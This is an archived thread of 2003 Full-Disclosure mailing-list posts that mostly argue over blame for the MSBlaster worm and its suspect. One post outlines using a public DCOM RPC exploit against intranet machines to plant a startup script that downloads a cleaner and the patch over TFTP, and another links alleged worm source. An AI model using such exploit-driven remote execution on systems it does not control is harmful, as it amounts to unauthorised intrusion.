RE: [Full-Disclosure] Authorities eye MSBlaster suspect
I'd agree but I'd need to add something to that... Its also the responsibility of 'the person or orginization that connects to a hostile enviroment' to make some decent effort to reduce the level of hostility in that environment. Hostility is neither the enemy of nor an effective counter or deterrent to hostility. [mailto:[EMAIL PROTECTED] On Behalf Of morning_wood my stance is that as a entity on the internet, it is the responsibility of the person or orginization that connects to a hostile enviroment to ensure themselves a reasonable ammount of protection. [huge great snip in the interests of non-top-posting] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
In my opinion, this is just a sad attempt to deflect responsibility away from Microsoft Corporation. Yeah, the kid is quite foolish for making himself such an easy scapegoat...but I'm sure the prosecutors will push for more punishmentthan he deserves since the ORIGINAL virus writer(s) have not been named. Now, every asshole in America will be talking about this kid at work, dinner parties, vacation, etc. I can just see it now... - "Did you hear about the kid in Minnesota that wrote that virus? Remember...you couldn't turn on your computer because it kept rebooting?" -"Oh yeah...I had to pay $50 to get that fixed at Joe's computer shop...they caught the guy?" -"Yeah...hes in big trouble" The problem is that governments and corporations own the media and this story is not going to be represented in a fair way to John Q. Public. I feel very sorry for the kid...he's only in high school and now he'll probably have a criminal record (federal). Kris Hermansen
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
--On Friday, August 29, 2003 3:47 PM -0500 Jerry Heidtke [EMAIL PROTECTED] wrote: It looks like it took the FBI 6 days to find what took 10 minutes on Google. Let's see, executable name is teekids.exe, here's a script-kiddie that goes by teekid, he's got a web site called t33kid.com, the whois for the domain gives his real name and address. Enough probable cause to get a warrant right there. Wow! I'm glad you're not in charge of the Justice Department. I would *hope* you need a little more proof than that. Everything you've listed is purely circumstantial. Wouldn't you at least like to have an IP linking him to the seeding of the worm? Or is the mere presence of his handle enough to throw his ass in jail? Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
--On Friday, August 29, 2003 3:43 PM -0700 Anthony Saffer [EMAIL PROTECTED] wrote: Sorry for just jumping in here but I couldn't resist. Certainly, you have to admit that there is a such thing as shared responsibility and contributory negligence. Even the law recognizes these things. Sure, it's the coders fault for creating and releasing the worm but the administrators do bear SOME responsibility for not being proactive and patching their systems. There have been cases of patches being available for 6 months to a year and a worm coming along and cleaning house. How can anyone say that the admin isn't partially responsible? Absolutely the admins are at least partly responsible for the damage caused to their own systems (and I would argue the greater the time since a patch was released the more responsibility they bear) and for damage they cause to other systems. But for the worm itself? Absolutely not. Sure, in a perfect world, we wouldn't have to worry about patching our systems and all would be well. But we don't live in a perfect world and every computer admin should know how to patch his system. If he/she doesn't then they shouldn't have their job. There is, after all, a such thing as preventative action. In a perfect world, admins would get to implement the practices they know to be best for their organization. We don't live in a perfect world. Oftentimes admins' hands are tied by the decision makers who control the purse strings. We still have infected hosts in the student apartments. Would you blame the admins for that? By law they are not allowed to support the students' personal computers. The best they can do is deny them network access until they're fixed. So the damage is limited to our network and doesn't go out to the world. Yet you would have them fired for incompetence. The admins know exactly what to do to protect a system. In this case they aren't allowed to do it. Yet, if the worm writer hadn't released the worm, the problem wouldn't even exist, would it? Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] How to massively remove DCOM RPC Worms
Hi Gentlemen, Following the article http://www.securityfocus.com/archive/119/333927, I applied this principle on our IntraNet. I used the oc192-dcom proof of concept code from securityfocus too. I create a ms.bat script placed into the startup group (c:\documents and setting\all users\...\startup) This scripts downloads via TFTP - stinger to remove active worms (else there are issues patching) - MS03-026 to the associate OS (Win2K or XP) On XP machine the reboot is automatic when you kill the exploit (I did not searched yet how to reboot on Win2K) Result: after the reboot, the ms.bat script is launched, it cleans the box and install the patch. Then it deletes itself and associated files. Again, on XP, installing the patch generate XP reboots automatically. The only problem is patch requires user action to approve. Maybe there is a version more silent. This trick has been included into a scanning program running on a FreeBSD 4.8 and so this simple trick permits to patch hundreds of machines. Might be useful to others Brgrds Laurent LEVIER IT Systems Networks Security Expert ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Fw: Computers crashed just before blackout
(notes below...) - Original Message - From: Richard M. Smith [EMAIL PROTECTED] To: [EMAIL PROTECTED]; 'Michael Scheidell' [EMAIL PROTECTED]; 'Alan Kloster' [EMAIL PROTECTED]; 'Geoff Shively' [EMAIL PROTECTED]; 'Drew Copley' [EMAIL PROTECTED] Sent: Friday, August 29, 2003 6:35 AM Subject: Computers crashed just before blackout http://www.cleveland.com/news/plaindealer/index.ssf?/base/news/106207424 774610.xml Computers crashed just before blackout 08/28/03 John Funk Teresa Dixon Murray and Tom Breckenridge Plain Dealer Reporters FirstEnergy Corp. could not see mounting transmission line problems in the crucial hour before the Aug. 14 blackout because its key computers were down, according to at least two municipal electric systems. Whether the computer troubles were the result of hardware or software problems was not known yesterday. Investigators from the Department of Energy have visited the utility's Akron control center, said spokesman Ralph DiNicola. FirstEnergy is detailing how the control center computers operated that day for the DOE, said DiNicola. He repeatedly declined to say whether there were any computer problems. ... Yep, looks like the HMI systems (that allow the humans to see warnings and critical situations) and to manually reroute power went down. Bet you 30,000 quatros that those HMI systems communicated to the SCADA systems via DCOM. Time for our lobbiests in DC to get to work, making sure all critical infostructure systems, utilities, water, power, traffic, AIR CONTROL update their best practices Also time for HMI/SCADA/FA vendors to update their clients, and make sure that this won't happen again. Looks like the clients/end users will need to firewall their SCADA/FA systems and forget the microsoft 'COTS' (commercial off the shelf) office/factory integration promise. -- Michael Scheidell, CEO SECNAP Network Security, LLC Sales: 866-SECNAPNET / (1-866-732-6276) Main: 561-368-9561 / www.secnap.net Looking for a career in Internet security? http://www.secnap.net/employment/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
The FBI followed the same steps that you outlined to locate Jeffrey Parson according to his indictment papers. The FBI also got an IP address for Jeffrey which traced back to his house from the hosting service for t33kid.com. Moral of the story: If you want to be a successful cybercriminal, remember to always hide behind proxy servers and don't use your real name and address when registering a domain name. If found guilty, I think an appropriate sentence is to make him clean up virus infected computers in public schools for a year. Richard -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jerry Heidtke Sent: Friday, August 29, 2003 4:47 PM To: the lumpalaya Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Authorities eye MSBlaster suspect It looks like it took the FBI 6 days to find what took 10 minutes on Google. Let's see, executable name is teekids.exe, here's a script-kiddie that goes by teekid, he's got a web site called t33kid.com, the whois for the domain gives his real name and address. Enough probable cause to get a warrant right there. Jerry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
So you would blame ... Nice set of ethics there. you believed that admins were at fault for worm infections. ...it is each admins responsiblity ... not the coder. a crime victim is affected by the crime ... Before we can make progress in a discussion of blame we have to get the analogy right. A biological virus is comprised of the same programming instructions we possess, and execute, as organisms: nucleic acids. HIV exists. Suppose it were engineered on purpose. It makes logical sense to blame every infection, all affects, every death, on the genetic engineer. Perpetually. Despite proof that shows that the virus is evolving in the wild without further engineering help. Because said virus would not exist, and thus no variants would exist, if not for the engineering effort of the original programmer. Suppose another engineer tinkers with the genetic code of the original HIV and makes something different, better, or just tries to innoculate everyone by turning it into a 'good' virus. The original programmer/engineer would logically continue to bear part of the blame. Bad computer code isn't much different from bad nucleic acids. When a person is responsible for creating the instructions, shouldn't that person be blamed for everything that those instructions, and works derived from those instructions, do that is either 'good' or 'bad'? Logically, yes. In practice, in a context of full disclosure where known 'safe' behaviors, practices, technology, and essential defense mechanisms must be deployed by anyone who chooses to engage in risky behavior because the threat is well understood and is no longer secret, the answer must be no. It is the person who delivers the bad instructions who must be found to be at fault, not the person who created the bad instructions. Legally, this distinction is recognized by some but not all computer crime legislation. There is almost a balance presently, and prosecutors are nearly empowered with the flexibility to decide in which direction to tip that balance on a case-by-case basis. Which way we let the laws tip for future prosecutions is a very important social choice that we're all in the process of making. We could argue that the hypothetical author of HIV is to blame for AIDS infections and deaths even if she never infected anyone simply because she left the virus lying around in proximity to humans who she should have known would end up infected with it. We could argue that by not making it an airborne virus she intentionally added a safety precaution, and without this precaution the original infection(s) caused by proximity to the virus constitute her 'delivery' of the virus to those who were infected. There are many ways to look at the issue, and after considering all available evidence and weighing the applicable ethics and the principles of law, logic, and reason we're all still going to disagree... But to engage in such a discussion, and it is an important one, the notion that crime has occurred simply because there are victims must be challenged. We cannot automatically apply the standards of blame that we use for rape and murder to the harm that is done to people whose computer systems are affected by malicious code. I personally delivered zero MS Blaster.* infections to others, intentionally or unintentionally. On the other hand, I have personally delivered cold and flu infections to others and perhaps some bacterial infections as well, despite the fact that I knew that I was sick. I've personally continued to work, attend school, or live in close proximity to somebody who was infectious, knowing that in doing so I was likely to become a replication vector for the infectious disease and spread the infection to others. Before I was aware of the risk, and my responsibility to protect others by protecting myself, before I knew that there were steps I must take to contain the spread of infectious illness, I posed a severe and unwarranted threat to others. By spreading my cold, flu, or bacterial infections to others 'unintentionally' yet as a direct result of negligence or ignorance I was in fact to blame for the harm that I caused directly to others. Was I to blame for the harm that others subsequently caused to others through additional rounds of infection? I don't know. *Should* I be blamed? Maybe. If there was malicious intent, if the spread of the infection was purposeful, then yes. By virtue of my possession and dissemination of the harmful nucleic acids or bacteria if I've taken appropriate precautions to limit the risk they pose to others? No. Do we blame the hypothetical author of the HIV genetic code for the outbreak of AIDS? If not, by virtue of the lack of effort to spread/deliver/infect, then we can't blame the author of MS Blaster.* for its outbreak. Otherwise, we must make it clear as a matter of law that engaging in research and development that results in harmful organisms, substances, or instructions is, in and of itself, a crime --
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
On Fri, 29 Aug 2003 12:22:19 PDT, morning_wood [EMAIL PROTECTED] said: get educated, take some responsibility for you high paying job, and quit trying to lay the blame elsewhere. On Fri, 29 Aug 2003 13:04:19 PDT, morning_wood [EMAIL PROTECTED] said: i think you mixed the top portion of my post with the poor me examples on the bottom, i blame the person that commits the act Well... if it's the fault of the person committing the act, why are you complaining about the first poster putting the blame elsewhere? Yes, he *COULD* be doing all this work up-front - the point is that whether he does it before or after, he's still having to do stuff to protect HIS network from others. And has it occurred to you that *MAYBE* his high paying job would be more productive if he wasn't spending most of his time having to deal with people breaking in, either proactively or reactively?? pgp0.pgp Description: PGP signature
[Full-Disclosure] Authorities eye MSBlaster suspect (long reply)
On Friday, August 29, 2003 12:22 PM, morning_wood [mailto:[EMAIL PROTECTED] wrote: shouldnt these measures been in place already? instead of rushing on a per-incident basis, you should be implimenting these things anyway. IMHO is prudent to expend some overkill during lockdown and penetration testing on a system when it is deployed or periodically tested, so there is a reduction during a per-incident basis. IMHO, security is as heterogenic as the types of people or entities connected to the Internet. Your suggestion befits a single deployment or a range of entitles. But when adding the complexity of multiple locations, heterogeneous systems, multiple ownership, and an open environment, security is more complex than written policy, training, automated tools, lockdowns, or penetration testing. In short, yeah, what you suggest is true but now let's talk about a part of the real world that is examined infrequently. Private (and non-profit) enterprises can operate under a different set of rules than an educational institution. By nature, a university network is an open resource. Although segments of that network are cordoned off (and I live in part of that cordoned segment), the vast majority are interconnected. Additionally, faculty, staff, students, alumni, and even the public, can use our resources. Research and sharing is a high priority. As to the latest exploit, measures were already in place. On the medical side, HIPAA already covers making best efforts to protect patient privacy. For example if a machine in the medical center is compromised, it is removed immediately from the network as soon as the compromise is discovered. For the remainder of university campus, if any machine compromises the network (as in virus/worm source), its network port is disable until the machine is repaired. But all it takes is one machine and you have generated the incident which requires the response. Now consider the task of maintaining patches on 20,000 hosts (5,000 in health sciences; 15K through the rest of the Seattle campus). For those systems running Windows, the versions ranging from Windows 95 to Win2K+3. At best, patching is an Aegean effort. To complicate matters the central computing group for the university owns only a modest fraction of this number. More than 4/5 are owned by the various autonomous schools and departments in the university, each responsible for their own patching and maintenance. Nor are funds available to replace all old machines or operating systems so proclamation cannot be issues that that the old (and normally less secure) systems shall vanish. And just what can be locked down? Systems, both workstations and servers, in the medical center have a strong best-practices policy. They live in a moderately-secured area of the network. But what about anything else that can touch them? The systems of doctors, students, and staff at home? How about a visiting doctor's, professor's, or even a salesman's machine? Computers in labs where a professor and a few assistants labor on problems. Students' notebooks? Each has been a live infection point. And I can overwhelm this list with other actual examples that defy a homogenous security policy. Recall that security balances against usability and resources. While portions of the network can be secure, an entire educational network cannot be secured without size of an expenditures typically the domain of private corporations. The size of expenditure well beyond the desire demonstrated by state legislatures nationwide (and parallel government bodies worldwide). Nor can the network be secured to an exceptionally low incident-level without depriving your employees (faculty staff) and customers (students and the public) of those resources. And upon that subject of resources, like many other publicly-funded entities our budget has been reduced. We are doing more with less money. No complaint, businesses do it during downturns. So shall we. But my group's job enables investigators to conduct research that results in improving medical treatment. Did I mention that every dollar spent comes from your pocket? So, may I ask, it is more desirable to spend your money on improving response to human disease or improving response to electronic distress. It's strictly an allocation of finite resources, that dollar gets spent on one thing or the other. Which do you choose? get educated, take some responsibility for you high paying job, and quit trying to lay the blame elsewhere. I take your statement rhetorically since zero research was conducted on my bona fides. Nor will I breach netiquette in responding to a personal basis. I will claim my education is expansive, I do take responsibility, my compensation is considered moderate in the academic world. And the blame is laid where the blame is due. No one can present successfully to me the argument that these incidents favor us (the corporation/institution/public/whatever) by forcing
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
The problem is that governments and corporations own the media and this story is not going to be represented in a fair way to John Q. Public. I feel very sorry for the kid...he's only in high school and now he'll probably have a criminal record (federal). Why feel sorry for him? While it's true that the blame for the problem lies mainly with Microsoft and unpatched systems, this kid is an adult and he knew what he was doing was illegal. He also knew the potential consequences. At some point he made the conscious decision to disregard the law and, thereby, accept any consequences his actions might incur. Nobody forced him to do it. It was his choice. Anthony Saffer SCS Consulting Services www.safferconsulting.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] MsBlaster Source?
That's the source to Nachia/Welchia. -Original Message- From: Shanphen Dawa [mailto:[EMAIL PROTECTED] Sent: Friday, August 29, 2003 5:01 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] MsBlaster Source? Can anyone, who is obviously better at coding then I, verify the rumours that the following link, is the source to msblaster? https://www.xfocus.net/bbs/index.php?act=STf=1t=26924 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html Confidentiality Notice: This e-mail message, including any attachments, is for the sole use of the intended recipient(s) and may contain confidential and privileged information. Any unauthorized review, use, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply e-mail and destroy all copies of the original message. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
So you would blame ... Nice set of ethics there. you believed that admins were at fault for worm infections. ...it is each admins responsiblity ... not the coder. a crime victim is affected by the crime ... Before we can make progress in a discussion of blame we have to get the analogy right. A biological virus is comprised of the same programming instructions we possess, and execute, as organisms: nucleic acids. HIV exists. Suppose it were engineered on purpose. It makes logical sense to blame every infection, all affects, every death, on the genetic engineer. Perpetually. Despite proof that shows that the virus is evolving in the wild without further engineering help. Because said virus would not exist, and thus no variants would exist, if not for the engineering effort of the original programmer. Suppose another engineer tinkers with the genetic code of the original HIV and makes something different, better, or just tries to innoculate everyone by turning it into a 'good' virus. The original programmer/engineer would logically continue to bear part of the blame. Bad computer code isn't much different from bad nucleic acids. When a person is responsible for creating the instructions, shouldn't that person be blamed for everything that those instructions, and works derived from those instructions, do that is either 'good' or 'bad'? Logically, yes. In practice, in a context of full disclosure where known 'safe' behaviors, practices, technology, and essential defense mechanisms must be deployed by anyone who chooses to engage in risky behavior because the threat is well understood and is no longer secret, the answer must be no. It is the person who delivers the bad instructions who must be found to be at fault, not the person who created the bad instructions. Legally, this distinction is recognized by some but not all computer crime legislation. There is almost a balance presently, and prosecutors are nearly empowered with the flexibility to decide in which direction to tip that balance on a case-by-case basis. Which way we let the laws tip for future prosecutions is a very important social choice that we're all in the process of making. We could argue that the hypothetical author of HIV is to blame for AIDS infections and deaths even if she never infected anyone simply because she left the virus lying around in proximity to humans who she should have known would end up infected with it. We could argue that by not making it an airborne virus she intentionally added a safety precaution, and without this precaution the original infection(s) caused by proximity to the virus constitute her 'delivery' of the virus to those who were infected. There are many ways to look at the issue, and after considering all available evidence and weighing the applicable ethics and the principles of law, logic, and reason we're all still going to disagree... But to engage in such a discussion, and it is an important one, the notion that crime has occurred simply because there are victims must be challenged. We cannot automatically apply the standards of blame that we use for rape and murder to the harm that is done to people whose computer systems are affected by malicious code. I personally delivered zero MS Blaster.* infections to others, intentionally or unintentionally. On the other hand, I have personally delivered cold and flu infections to others and perhaps some bacterial infections as well, despite the fact that I knew that I was sick. I've personally continued to work, attend school, or live in close proximity to somebody who was infectious, knowing that in doing so I was likely to become a replication vector for the infectious disease and spread the infection to others. Before I was aware of the risk, and my responsibility to protect others by protecting myself, before I knew that there were steps I must take to contain the spread of infectious illness, I posed a severe and unwarranted threat to others. By spreading my cold, flu, or bacterial infections to others 'unintentionally' yet as a direct result of negligence or ignorance I was in fact to blame for the harm that I caused directly to others. Was I to blame for the harm that others subsequently caused to others through additional rounds of infection? I don't know. *Should* I be blamed? Maybe. If there was malicious intent, if the spread of the infection was purposeful, then yes. By virtue of my possession and dissemination of the harmful nucleic acids or bacteria if I've taken appropriate precautions to limit the risk they pose to others? No. Do we blame the hypothetical author of the HIV genetic code for the outbreak of AIDS? If not, by virtue of the lack of effort to spread/deliver/infect, then we can't blame the author of MS Blaster.* for its outbreak. Otherwise, we must make it clear as a matter of law that engaging in research and development that results in harmful organisms, substances, or instructions is, in and of itself, a crime --
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
On Fri, 29 Aug 2003 14:46:32 PDT, morning_wood said: And has it occurred to you that *MAYBE* his high paying job would be more productive if he wasn't spending most of his time having to deal with people breaking in, either proactively or reactively?? that is his job You're totally missing the point. If I'm doing security 30 hours a week, that's 30 hours a week I'm not available for other things. That's 30 hours I'm not spending helping do network performance tuning for the mail server. I'm sure the 70,000 users of the mail server would prefer that I was able to do that instead. That's 30 hours I'm not spending designing a new, more featureful print management system. I'm sure the people who get print jobs that we need to keep running (accounts receivable, invoices, purchase orders, etc) would prefer I was able to do that instead. That's 30 hours I'm not spending diagnosing compiler and kernel bugs. I'm sure the researcher who has a $2M grant project dead in the water would prefer I was able to do that instead. That's 30 hours I'm not spending working on a way to migrate users from Windows to Linux. I'm sure the people who are looking at a $500K/year bill for Microsoft licenses (and want a way to save money) would prefer I was able to do that instead. That's 30 hours I'm not spending deploying a new release of Listserv that has features that my users are asking for. I'm sure that many of the users on our 6,023 lists would prefer I was able to do that instead. You starting to see a pattern here? And yes, those are *ALL* things that are *part of* my job. Many of them are things I'd enjoy doing more. All of them are things that would provide more *direct* benefit to my site than doing security. And you can't weasel out by saying Hire somebody else to do that other stuff or hire somebody else to do security - the point is that if we did hire somebody else, then we'd only have 1 person of the 2 available for productive work. If we didn't have to keep spending resources on security, BOTH people would be available then. pgp0.pgp Description: PGP signature
Re: [Full-Disclosure] RIP: ActiveX controls in Internet Explorer?
Richard M. Smith [EMAIL PROTECTED] wrote: As everyone knows, ActiveX controls and the OBJECT tag has been a big source of security holes in Internet Explorer. ... And serious exposures in other browsers too. Remember, the folk writing most of these fancy plug-in doo-dad thingamies are largely clueless about Internet security and the ramifications of accepting arbitrary data, particularly if it is not produced by their own software at the other end of the pipe. In fact, I'd not be surprised if, on average, they are much worse than MS but have managed to evade the spotlight due to the preponderance of attention several hundred million more potential targets buys MS... For just one chronically bad, equal-to-anything-ever-in-IE, example just look at the very recently disclosed RealOne Player, et al. bug (sorry, URL will wrap): http://www.digitalpranksters.com/advisories/realnetworks/smilscriptproto col.html ... However, it looks like support for ActiveX controls is going to be removed from Internet Explorer. A small company called Eolas recently won a $521 million judgment against Microsoft for patent infringement. The Eolas patent covers plugins in Web pages to show multimedia content. Yes -- kinda nice result (and there I was thinking software patents were necessarily all bad... 8-) ). The $521 million payment covers past infringement. Because Bill Gates loathes to pay per-copy royalties, ... How ironic. Given that a large chunk of his personal fortune is due to the unethical and illegal Windows taxcollected by his company for all those years (and still effectively being paid by many choosing not to run his company's OSes), and given his company's (legal department's) repeated statements about how much the company respects IP and depends on protecting its own IP, and given the clearly gross profiteering the company has engaged in to accumulate at least $49 billion cash reserves (sorry -- $48.479 billion now), you'd think shelling out a few cents per copy of Windows to show your respect for someone else's IP used liberally in a critical component of your OS (another irony -- the DoJ defense comes full circle to bite Bill's arse to the tune of $521 million) would be small beer... ... it looks like Microsoft is going to either partially or completely remove support for ActiveX controls in Internet Explorer rather than pay Eolas any more money. Cool. Pity though that that other recent court ruling threatening to require MS to ship a true Java client didn't stick -- had it, MS would have had an easy solution _and_ an easy out for the total about-face of such a move. Combined these two rulings could have saved its sorry arse basically for free, aside from the loss of face... snip patent talk The W3C has set up a discussion list to talk about replacements for ActiveX in Internet Explorer: http://www.w3.org/2003/08/patent Fortunately the corruption of W3C's role apparent in your chosen wording (making W3C the driver of standards to cement IE as _the_ web browser) is not actually reflected in the content of that page! 8-) It seems they really are concerned that this patent will upset the whole applecart (or at least, a substantial chunk of the applecart developer market -- I doubt the folk behind Lynx are too concerned). That said however, several of the heavy-hitters in W3C potentially have a lot to lose if this patent has teeth and is applied to other browsers too -- dream of a web without SWF and all those other, lesser third- party abominations that so seriously detract from the original concept... Then consider the W3C's stated goals: http://www.w3.org/Consortium/#goals and in particular: 1. Universal Access: To make the Web accessible to all by promoting technologies that take into account the vast differences in culture, languages, education, ability, material resources, access devices, and physical limitations of users on all continents; I hope that security people also join this list. This redesign of the Internet Explorer browser looks like the perfect time to put pressure on Microsoft to put in place a proper security system for browser add-ins. Indeed. Unfortunately, the page linked above is rather telling -- it does not mention the words secure, securely or security once. Given this lofty ideal from: http://www.w3.org/Consortium/#mission ... To meet the growing expectations of users and the increasing power of machines, W3C is already laying the foundations for the next generation of the Web. W3C's technologies will help make the Web a robust, scalable, and adaptive infrastructure for a world of information. I'd say its about time the W3C addressed security issues head-on. Of course, how willing and able a standards body stacked with the commercial interests of its industry sector might be to completely revamping and correcting its previous errors is a good question...
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
So you would blame ... Nice set of ethics there. you believed that admins were at fault for worm infections. ...it is each admins responsiblity ... not the coder. a crime victim is affected by the crime ... Before we can make progress in a discussion of blame we have to get the analogy right. A biological virus is comprised of the same programming instructions we possess, and execute, as organisms: nucleic acids. HIV exists. Suppose it were engineered on purpose. It makes logical sense to blame every infection, all affects, every death, on the genetic engineer. Perpetually. Despite proof that shows that the virus is evolving in the wild without further engineering help. Because said virus would not exist, and thus no variants would exist, if not for the engineering effort of the original programmer. Suppose another engineer tinkers with the genetic code of the original HIV and makes something different, better, or just tries to innoculate everyone by turning it into a 'good' virus. The original programmer/engineer would logically continue to bear part of the blame. Bad computer code isn't much different from bad nucleic acids. When a person is responsible for creating the instructions, shouldn't that person be blamed for everything that those instructions, and works derived from those instructions, do that is either 'good' or 'bad'? Logically, yes. In practice, in a context of full disclosure where known 'safe' behaviors, practices, technology, and essential defense mechanisms must be deployed by anyone who chooses to engage in risky behavior because the threat is well understood and is no longer secret, the answer must be no. It is the person who delivers the bad instructions who must be found to be at fault, not the person who created the bad instructions. Legally, this distinction is recognized by some but not all computer crime legislation. There is almost a balance presently, and prosecutors are nearly empowered with the flexibility to decide in which direction to tip that balance on a case-by-case basis. Which way we let the laws tip for future prosecutions is a very important social choice that we're all in the process of making. We could argue that the hypothetical author of HIV is to blame for AIDS infections and deaths even if she never infected anyone simply because she left the virus lying around in proximity to humans who she should have known would end up infected with it. We could argue that by not making it an airborne virus she intentionally added a safety precaution, and without this precaution the original infection(s) caused by proximity to the virus constitute her 'delivery' of the virus to those who were infected. There are many ways to look at the issue, and after considering all available evidence and weighing the applicable ethics and the principles of law, logic, and reason we're all still going to disagree... But to engage in such a discussion, and it is an important one, the notion that crime has occurred simply because there are victims must be challenged. We cannot automatically apply the standards of blame that we use for rape and murder to the harm that is done to people whose computer systems are affected by malicious code. I personally delivered zero MS Blaster.* infections to others, intentionally or unintentionally. On the other hand, I have personally delivered cold and flu infections to others and perhaps some bacterial infections as well, despite the fact that I knew that I was sick. I've personally continued to work, attend school, or live in close proximity to somebody who was infectious, knowing that in doing so I was likely to become a replication vector for the infectious disease and spread the infection to others. Before I was aware of the risk, and my responsibility to protect others by protecting myself, before I knew that there were steps I must take to contain the spread of infectious illness, I posed a severe and unwarranted threat to others. By spreading my cold, flu, or bacterial infections to others 'unintentionally' yet as a direct result of negligence or ignorance I was in fact to blame for the harm that I caused directly to others. Was I to blame for the harm that others subsequently caused to others through additional rounds of infection? I don't know. *Should* I be blamed? Maybe. If there was malicious intent, if the spread of the infection was purposeful, then yes. By virtue of my possession and dissemination of the harmful nucleic acids or bacteria if I've taken appropriate precautions to limit the risk they pose to others? No. Do we blame the hypothetical author of the HIV genetic code for the outbreak of AIDS? If not, by virtue of the lack of effort to spread/deliver/infect, then we can't blame the author of MS Blaster.* for its outbreak. Otherwise, we must make it clear as a matter of law that engaging in research and development that results in harmful organisms, substances, or instructions is, in and of itself, a crime --
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
I didn't say anything about throwing his ass in jail, did I?. Since when did getting a warrant = incarceration? The evidence cited would be enough to at least cause him to be talked to, don't you think, even in an environment where there was some respect for civil rights and the presumption of innocence still existed. In the US's political climate these days, people have been disappeared for months on evidence more circumstantial than that. I don't like it or agree with it. Take it up with Herr Ashcroft. -Original Message- From: Paul Schmehl [mailto:[EMAIL PROTECTED] Sent: Friday, August 29, 2003 5:15 PM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Authorities eye MSBlaster suspect --On Friday, August 29, 2003 3:47 PM -0500 Jerry Heidtke [EMAIL PROTECTED] wrote: It looks like it took the FBI 6 days to find what took 10 minutes on Google. Let's see, executable name is teekids.exe, here's a script-kiddie that goes by teekid, he's got a web site called t33kid.com, the whois for the domain gives his real name and address. Enough probable cause to get a warrant right there. Wow! I'm glad you're not in charge of the Justice Department. I would *hope* you need a little more proof than that. Everything you've listed is purely circumstantial. Wouldn't you at least like to have an IP linking him to the seeding of the worm? Or is the mere presence of his handle enough to throw his ass in jail? Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html Confidentiality Notice: This e-mail message, including any attachments, is for the sole use of the intended recipient(s) and may contain confidential and privileged information. Any unauthorized review, use, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply e-mail and destroy all copies of the original message. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] MsBlaster Source?
if ( !MyStartService(szServiceTftpd) ){ does appear so. Seems like there is more code that's not here. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jerry Heidtke Sent: Friday, August 29, 2003 6:59 PM To: Shanphen Dawa; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] MsBlaster Source? That's the source to Nachia/Welchia. -Original Message- From: Shanphen Dawa [mailto:[EMAIL PROTECTED] Sent: Friday, August 29, 2003 5:01 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] MsBlaster Source? Can anyone, who is obviously better at coding then I, verify the rumours that the following link, is the source to msblaster? https://www.xfocus.net/bbs/index.php?act=STf=1t=26924 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html Confidentiality Notice: This e-mail message, including any attachments, is for the sole use of the intended recipient(s) and may contain confidential and privileged information. Any unauthorized review, use, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply e-mail and destroy all copies of the original message. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
